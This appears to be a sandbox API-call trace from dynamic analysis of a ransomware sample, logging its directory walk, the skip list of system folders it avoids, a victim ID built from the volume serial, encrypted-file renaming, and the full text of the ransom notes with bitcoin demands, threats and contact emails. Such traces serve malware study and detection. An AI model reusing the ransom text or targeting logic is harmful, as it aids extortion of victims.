	[0182.915] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3e44760, ftCreationTime.dwHighDateTime=0x1d973dd, ftLastAccessTime.dwLowDateTime=0xa2b0d930, ftLastAccessTime.dwHighDateTime=0x1d97615, ftLastWriteTime.dwLowDateTime=0xa2b0d930, ftLastWriteTime.dwHighDateTime=0x1d97615, nFileSizeHigh=0x0, nFileSizeLow=0x141c9, dwReserved0=0x0, dwReserved1=0x0, cFileName="z02M6KpVHTJ.rtf", cAlternateFileName="Z02M6K~1.RTF")) returned 0
	[0182.915] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0182.915] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0182.915] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D"
	[0182.915] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\*.*"
	[0182.916] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0182.916] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0182.916] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\HELP_DECRYPT_YOUR_FILES.TXT") returned 70
	[0182.916] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0182.917] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0182.917] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0182.920] CloseHandle (hObject=0x384) returned 1
	[0182.920] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0182.920] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.920] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0182.921] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0182.921] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0182.922] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0182.922] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0182.922] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0182.922] CloseHandle (hObject=0x384) returned 1
	[0182.922] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0182.923] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0182.923] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0182.923] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\HELP_DECRYPT_YOUR_FILES.HTML") returned 71
	[0182.923] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0182.923] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0182.924] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0182.927] CloseHandle (hObject=0x384) returned 1
	[0182.927] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.928] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0182.928] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.928] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0183.030] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0183.030] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0183.030] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0183.030] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0183.030] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0183.031] CloseHandle (hObject=0x384) returned 1
	[0183.031] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd285ee50, ftCreationTime.dwHighDateTime=0x1d97379, ftLastAccessTime.dwLowDateTime=0x868e3575, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x868e3575, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0183.031] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\*.*") returned 46
	[0183.031] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0183.033] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\*.*", cchLength=0x2e | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*") returned 0x2e
	[0183.033] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.033] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="windows") returned 0x0
	[0183.034] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.034] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="boot") returned 0x0
	[0183.034] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.034] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="system volume information") returned 0x0
	[0183.034] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.034] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0183.034] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.034] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="temp") returned 0x0
	[0183.035] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.035] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="program files") returned 0x0
	[0183.035] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.035] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="program files (x86)") returned 0x0
	[0183.035] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.035] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="appdata") returned 0x0
	[0183.035] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.035] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="application data") returned 0x0
	[0183.036] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.036] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="winnt") returned 0x0
	[0183.036] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.036] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="tmp") returned 0x0
	[0183.036] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.036] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="cache") returned 0x0
	[0183.036] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.037] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="temporary internet files") returned 0x0
	[0183.037] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.037] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="webcache") returned 0x0
	[0183.037] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.037] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="inetcache") returned 0x0
	[0183.037] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.037] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="nvidia") returned 0x0
	[0183.037] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.038] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="packages") returned 0x0
	[0183.038] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.038] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="cookies") returned 0x0
	[0183.038] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.038] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="programdata") returned 0x0
	[0183.038] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0183.038] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0183.038] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd285ee50, ftCreationTime.dwHighDateTime=0x1d97379, ftLastAccessTime.dwLowDateTime=0x868e3575, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x868e3575, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0183.039] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0183.039] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x868269cc, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x868269cc, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x868269cc, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x16150, dwReserved0=0x0, dwReserved1=0x0, cFileName="22_uir_zgnsods5-vj.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="22_UIR~1.SCL")) returned 1
	[0183.039] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x868e3575, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x868e3575, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x869ee2da, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0183.039] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x868e3575, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x868e3575, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x868e3575, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0183.039] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39d658f0, ftCreationTime.dwHighDateTime=0x1d975a6, ftLastAccessTime.dwLowDateTime=0xb49e42c0, ftLastAccessTime.dwHighDateTime=0x1d97667, ftLastWriteTime.dwLowDateTime=0xb49e42c0, ftLastWriteTime.dwHighDateTime=0x1d97667, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UXZZ", cAlternateFileName="")) returned 1
	[0183.039] lstrcmpW (lpString1="UXZZ", lpString2="..") returned 1
	[0183.039] lstrcmpW (lpString1="UXZZ", lpString2=".") returned 1
	[0183.039] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D"
	[0183.039] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\"
	[0183.039] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\", lpString2="UXZZ" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ"
	[0183.040] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ"
	[0183.040] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\"
	[0183.040] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\"
	[0183.040] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\*.*"
	[0183.040] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39d658f0, ftCreationTime.dwHighDateTime=0x1d975a6, ftLastAccessTime.dwLowDateTime=0xb49e42c0, ftLastAccessTime.dwHighDateTime=0x1d97667, ftLastWriteTime.dwLowDateTime=0xb49e42c0, ftLastWriteTime.dwHighDateTime=0x1d97667, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0183.040] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\*.*") returned 51
	[0183.040] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0183.041] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\*.*", cchLength=0x33 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*") returned 0x33
	[0183.041] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.041] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="windows") returned 0x0
	[0183.041] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.041] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="boot") returned 0x0
	[0183.041] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.041] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="system volume information") returned 0x0
	[0183.042] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.042] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0183.042] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.042] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="temp") returned 0x0
	[0183.042] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.042] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="program files") returned 0x0
	[0183.042] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.043] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="program files (x86)") returned 0x0
	[0183.043] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.043] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="appdata") returned 0x0
	[0183.043] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.043] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="application data") returned 0x0
	[0183.043] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.043] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="winnt") returned 0x0
	[0183.044] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.044] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="tmp") returned 0x0
	[0183.044] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.044] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="cache") returned 0x0
	[0183.044] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.044] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="temporary internet files") returned 0x0
	[0183.044] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.045] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="webcache") returned 0x0
	[0183.045] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.045] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="inetcache") returned 0x0
	[0183.045] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.045] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="nvidia") returned 0x0
	[0183.045] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.045] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="packages") returned 0x0
	[0183.045] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.046] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="cookies") returned 0x0
	[0183.046] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.046] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="programdata") returned 0x0
